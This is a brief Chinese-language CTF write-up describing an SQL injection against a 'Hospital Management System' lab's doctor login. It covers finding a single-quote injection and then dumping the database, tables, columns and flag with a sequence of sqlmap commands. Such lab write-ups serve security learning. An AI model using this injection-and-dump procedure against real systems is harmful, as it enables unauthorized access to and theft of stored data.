简介
Hospital Management System sqli
正文
首先进入靶场,有三个登录选项,一个患者,一个医生,一个访问者,首先来到患者随便注册一个账号进去发现没有任何可以利用的地方,所以我就退出了选择用医生登录界面进行sql注入。
首先进行抓包。
然后尝试了一下发现是单引号注入,但是接下来却不知道怎么爆破数据库名了,一直被过滤掉。没办法只能用sqlmap来爆破了
sqlmap开跑
先把这个包的内容复制到sqlmap根目录下并保存为2.txt
爆数据库名
python sqlmap.py -r 2.txt --batch --dbs
爆表名
>python sqlmap.py -r 2.txt -batch -D ctf -tables
爆列名
python sqlmap.py -r 2.txt -batch -D ctf -T flag -columns
爆数据
python sqlmap.py -r 2.txt -batch -D ctf -T flag -C flag -dump